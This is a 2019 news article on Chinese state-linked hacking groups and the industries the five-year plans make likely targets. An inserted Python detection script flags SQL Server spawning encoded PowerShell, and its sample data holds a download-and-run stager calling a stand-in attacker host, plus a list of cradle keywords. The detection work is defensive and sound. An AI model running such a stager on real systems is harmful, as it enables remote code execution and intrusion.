Chinese hacking groups to ramp up cyber attacks on some industries, experts say

Apr 02, 2019 (11 min read)

Companies in industries critical to China’s five-year plan face a higher risk of nation-state-sponsored cyber attacks.

[Image: Flag of China over binary code. Credit: BirgitKorber / Getty Images]

Since 1953, the Chinese government has issued official five-year plans. Each plan outlines the economic development goals and the main drivers that will help the country achieve those ambitions. They also act as advance warning of industries hacker groups will likely target.

This was the case with the 12th plan and is the case with the current 13th. With work for the 14th plan likely underway, a new group of industries could find themselves under attack from a number of sophisticated hacker groups. “Organizations need to understand how they are viewed by their adversaries and in the case of nation-states such as China how attractive are their personnel, locations, data and core intellectual property to those states,” warns Adam Meyers, VP of intelligence at CrowdStrike.

A shopping list for hackers

The current five-year plan runs until 2020. In it, the National People's Congress set out goals around making China a “moderately prosperous society,” including 6.5 percent annual gross domestic product (GDP) growth, increasing domestic R&D, achieving climate goals and bringing more people out of poverty.

The 13th plan also incorporated the “Made in China 2025” policy, which laid out the key industries in which the Chinese government is focused on becoming a world leader. These industries include:

  • Information technology
  • Robotics (including AI and machine learning)
  • Green energy and green vehicles
  • Aerospace equipment
  • Ocean engineering and high-tech ships
  • Power equipment
  • New materials
  • Medicine and medical devices
  • Agriculture machinery
  • Railway infrastructure

At the time of that plan’s announcement, CrowdStrike warned that companies working in these industries would likely suffer more cyberattacks from China-affiliated hackers — much the same as with the 12th plan — in an effort to steal intellectual property (IP), accelerate goals and reduce the country’s dependency on foreign firms for technology, equipment and infrastructure.

While there have been cyberattacks against major corporations since then, there have not been as many as some expected. This is due in part to an agreement in 2015 between U.S. President Obama and Chinese President Xi Jinping that neither country would “support cyber-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors.”

The agreement coincided with a reorganization and modernization of the Chinese People’s Liberation Army and the creation of the People’s Liberation Army Strategic Support Force, which houses operations around space, cyberspace and electronic warfare.

“Most of the cyber-capable units, notably the 3rd and 4th General Staff Department (GSD), where the publicly attributed units sat (the 1st Bureau was the APT1 unit designated 61398; the 12th Bureau was identified by CrowdStrike as Putter Panda in 2014), were reorganized into the PLASSF and Network Systems Department (NSD),” explains Meyers.

Trade war brings new attacks

The ongoing tit-for-tat tariffs, plus repeated warnings from U.S. officials over Huawei’s relationship with the Chinese government and its role in 5G, have strained relations between the two countries and attacks have increased.

“Now that there’s geopolitical pressure and the trade wars, we’ve seen a resurgence [in attacks]. All these groups are active again. They were less active and now they’re at full speed again,” says Otavio Freire, CTO of threat monitoring service SafeGuard Cyber. “You can only attribute it to the trade wars. The timing is suspiciously too coincidental that when relations were good, there were fewer attacks by the advanced persistent threats from China.”

A survey by CNBC found that one in five U.S. companies have had their IP stolen by China in the last 12 months. “In 2015, China promised to stop stealing trade secrets and other confidential business information through computer hacking with the intent of providing competitive advantages to companies or sectors,” Deputy Attorney General Rod Rosenstein said at the December 2018 press conference announcing the indictment of two Chinese nationals connected with the APT10 hacking group. “The activity alleged in this indictment violates the commitment that China made to members of the international community.”

As the cyber-détente has come to an end and the reorganization of the PLA has settled down, hacker activity is turning its focus back to the goals of the five-year plan. “The downturn in Chinese targeted intrusion activity observed in the wake of the 2015 agreement between China and the U.S. with regards to commercially motivated cyber-espionage appears to have been reversed,” says CrowdStrike’s Meyers. “Over the last year, CrowdStrike Intelligence has observed an increasing operational tempo from China-based adversaries. The threat of 25 percent tariffs on more than $50 billion worth of Chinese goods may be driving some of the recent activity.”

Multiple industries at risk

The 10 industries mentioned in the plans face attacks from threat actors with differing skillsets. The first group Meyers mentions is Wicked Panda (also known as APT17, Winnti Group, Tailgator Team, Deputy Dog and others), which has been active since 2009. “Wicked Panda has been linked to numerous incidents involving a broad set of targets including organizations in the mining, technology, manufacturing and hospitality sectors,” he explains. “The scope for this adversary group suggests they are contractors supporting high-priority operations as needed.”

“[In its most recent attacks] the actor compromised a running SQL Server process and attempted to upload and execute an open-source PowerShell Empire implant, which was intended to open a reverse TCP shell to the adversary-controlled domain,” Meyers says.
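The process-creation pattern Meyers describes, a database engine spawning PowerShell with an encoded stager that calls back to an attacker-controlled host, is exactly what a detection rule keys on. The script below is an added example, not code from the article or from CrowdStrike: it runs that check over constructed Sysmon-style process-creation records and decodes the -EncodedCommand argument so an analyst can read the payload. The field names, the indicator list, the hostname and every sample event are assumptions made for the example.

```python
"""Detect a database server process launching an encoded PowerShell stager.

Added example, not code from the article or from CrowdStrike. It models the
intrusion described above (a compromised sqlservr.exe trying to run a
PowerShell Empire style implant) as a parent/child process check over
constructed, Sysmon-Event-ID-1-like records. The field names, the marker
list and every sample event below are assumptions made for the example.
"""
import base64

# A database engine should essentially never spawn a shell; xp_cmdshell
# abuse shows up as sqlservr.exe -> cmd.exe (-> powershell.exe).
DB_PARENTS = {"sqlservr.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Substrings typical of a PowerShell download cradle or reverse-shell stager
# once the -EncodedCommand payload is decoded (assumed indicator list).
CRADLE_MARKERS = ("new-object", "net.webclient", "downloadstring",
                  "iex", "invoke-expression", "tcpclient")


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the script behind -e/-ec/-enc/-EncodedCommand, or '' if absent or invalid."""
    parts = cmdline.split()
    for i, tok in enumerate(parts[:-1]):
        if tok.lower().lstrip("-/") in ("e", "ec", "enc", "encodedcommand"):
            blob = parts[i + 1]
            try:
                raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
            except ValueError:
                return ""
            # PowerShell expects UTF-16LE inside the encoded argument.
            return raw.decode("utf-16-le", errors="ignore")
    return ""


def assess_event(ev: dict) -> dict:
    """Score one process-creation event; 'reasons' is empty for benign events."""
    parent, image = basename(ev.get("ParentImage", "")), basename(ev.get("Image", ""))
    reasons = []
    if parent in DB_PARENTS and image in SHELLS:
        reasons.append(f"{parent} spawned {image}")
    decoded = decode_encoded_command(ev.get("CommandLine", "")) if image in SHELLS else ""
    hits = [m for m in CRADLE_MARKERS if m in decoded.lower()]
    if hits:
        reasons.append("encoded PowerShell contains " + ", ".join(hits))
    return {"pid": ev.get("ProcessId"), "suspicious": bool(reasons),
            "reasons": reasons, "decoded": decoded}


def scan(events) -> list:
    """Return the assessments of every suspicious event, in input order."""
    return [r for r in map(assess_event, events) if r["suspicious"]]


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample telemetry (not real events); attacker.invalid is a reserved TLD.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://attacker.invalid/launcher')"
SAMPLE_EVENTS = [
    {"ProcessId": 4412,
     "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL14\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -enc " + encode_ps(STAGER)},
    {"ProcessId": 5120,  # an admin's script: same binary, benign parent, no cradle
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ProcessId": 6001,  # SQL Server's own crash-dump helper: expected child, not a shell
     "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL14\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Program Files\Microsoft SQL Server\140\Shared\SQLDumper.exe",
     "CommandLine": "SQLDumper.exe"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["pid"], "; ".join(hit["reasons"]), "|", hit["decoded"])
```

The rule fires on the parent/child pair alone, because the payload may not be base64-encoded at all; decoding the argument is what turns the alert into something an analyst can read, and the decoded text is where the callback host for the reverse shell would appear. On a real estate the same rule also catches xp_cmdshell abuse, which surfaces as sqlservr.exe launching cmd.exe before PowerShell ever runs.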

Other groups of note include APT10 (aka Menupass Team, Stone Panda), a Chinese Ministry of State Security (MSS)-affiliated group active since at least 2009 and targeting construction, engineering, aerospace, telecom and government. Known to use the Haymaker, Snugride, Bugjuice and QuasarRAT malware families, the group leverages both traditional spear phishing and managed service providers (including IBM and HPE, according to Reuters) to gain access to victims’ networks.

APT40 (aka Periscope), according to FireEye, has been active since 2013 and is thought to be dedicated to China’s naval modernization effort and the country’s Belt and Road Initiative. It is known to target engineering, transportation and defense companies with maritime links across the U.S., Europe, Southeast Asia and the Middle East. It has been observed impersonating an unmanned underwater vehicle (UUV) manufacturer and targeting universities engaged in naval research.

A report from the U.S.-China Economic and Security Review Commission on biotechnology says there have been at least six attempts by Chinese actors to remove IP from medical companies, covering robotic surgical equipment, cancer treatments, treatments for organ recipients, cornea regeneration, hepatitis C diagnostics and an anemia drug. Multiple attacks in the agriculture industry involved attempts to steal genetically engineered rice or corn seeds, while other thefts have targeted organic pesticides, engineered food products and livestock feed supplements.

SafeGuard Cyber tells CSO it has also seen a large amount of activity in the aerospace sector. “They want their own Boeing,” says Freire. “They want to stop buying from the United States.”

As well as APT groups, numerous insider attacks have targeted high-tech companies. In October 2018, the U.S. charged two alleged Chinese intelligence officers with attempting to steal IP and confidential business data, including information related to a turbofan engine used in commercial airliners, from aerospace companies.

Smaller hacker groups with no obvious or official ties to the Chinese government are also a threat. “It works more like a loosely coupled criminal enterprise than ‘everything is state sponsored’,” says Freire. “It is very network driven the attacks and it’s not centralized. Entrepreneur hackers approach a politician in a relevant department and say, ‘I have some information here, will you pay for it?’ China’s been able to create this environment and say, ‘We’re open for business. If you accomplish these objectives, we will pay for it.’”

Targeted industries face real consequences

Losing valuable IP to a competitor can be devastating; the full extent of the damage is often only seen years later. APT1 (aka the Comment Group), identified as Unit 61398 within the PLA, was attacking companies as far back as 2006 and is affiliated with the GhostNet, Aurora and Shady RAT campaigns. Companies named in a 2014 U.S. indictment as being victims of APT1 include SolarWorld, Westinghouse Nuclear and ATI Metals. The Financial Times reports that these attacks, in turn, helped boost Chinese aluminum company Chinalco, steelmaker Baosteel and nuclear power firm SNPTC.

“Intellectual property is really the lifeblood of these organizations,” says Freire. “The long-term consequences are for those countries and companies that were at the forefront of science and technology had that competitive advantage, that is lost forevermore. But it’s slow moving, so the consequences [of losing IP] are not as obvious.”

Those companies haven’t done well since they were hacked. German solar energy company SolarWorld was hacked in 2012 and filed for insolvency in 2017 (though the U.S. subsidiary is still in business and was recently acquired by SunPower).

“While the five Chinese military hackers have never been brought to justice in this country,” SolarWorld CEO Juergen Stein said in recent testimony, “we firmly believe that were it not for their economic espionage and theft from SolarWorld Americas, Chinese solar producers like JA Solar and Trina would have taken far longer to make the leap into PERC [Passivated Emitter and Rear Cell, a newer type of solar architecture] technology.”

Westinghouse, which designs and constructs nuclear power stations, lost sensitive emails and confidential proprietary technical and design specifications for piping within nuclear plant designs. Like SolarWorld, the group filed for bankruptcy in 2017 before agreeing in January 2018 to be sold to Brookfield Business Partners.

“Can you imagine how frustrating it would be,” says Freire. “You are Westinghouse, pursuing a nuclear deal, you’ve spent years with a government, you bid a price, explain what your differentiators are, and here comes another proposal that is a better financial model that addresses your differentiators.”

“To come up with a reactor design, it is hundreds of millions of dollars, 15 years in the making. If you steal that, it’s not just that you’ve gathered a full nuclear plant design that costs hundreds of millions, but also the time to market. The 15 years that it took to get to that pinnacle of nuclear design is the long-term geopolitical consequence.”

Though they never went into bankruptcy, ATI, along with aluminum company Alcoa and US Steel (two other companies named as victims in the 2014 indictment), have seen their share prices drop substantially as their competitive advantage has eroded. US Steel recently lost a trade secrets case at the U.S. International Trade Commission (ITC) against Chinese steel manufacturers, in which US Steel said it had seen valuable trade secrets stolen by the Chinese government and “used to produce advanced high-strength steel that no Chinese manufacturer had been able to commercialize before the theft.”

“They’ve been very successful. These industries came from nowhere and are now cutting-edge competitive industries from China,” says Freire. “China’s appropriated themselves of something that is so incredibly valuable that changes the trajectory of markets and is able to fast forward to the future when they get this information.”

The 14th plan is coming soon

The South China Morning Post has reported that work is underway on the next five-year plan, which will run from 2021 to 2025. As well as likely continuing to target companies in sectors named in the Made in China 2025 policy, any new industries the next plan highlights will likely face increased interest from threat actors trying to steal their IP.

“The 12th five-year plan was a veritable shopping list for Chinese intrusion groups during the 2011-2015 time frame, which they largely fulfilled,” says CrowdStrike’s Meyers. “The 13th five-year plan, which is currently in progress, has a focus on some fairly broad targets.”

“It is likely that China continues to see cyber espionage as a means to further enhance and develop the economy. Given the current Chinese efforts to be a leader in 5G and advanced communications technologies, I imagine there will be quite a focus on software and hardware in that arena [in the 14th plan],” says Meyers.

Quantum computing, machine learning, AI and communications will likely remain a focus, Meyers warns, as will medical technology (particularly digital healthcare and preventative medicine) and previously targeted industries such as biotech, defense, mining, pharmaceuticals, professional services, transportation and aerospace.

He adds that China’s Belt and Road Initiative, which sees the country making large infrastructure investments around the world to create a 21st century version of the Silk Road trading route, will also likely serve as a driver for intelligence collection.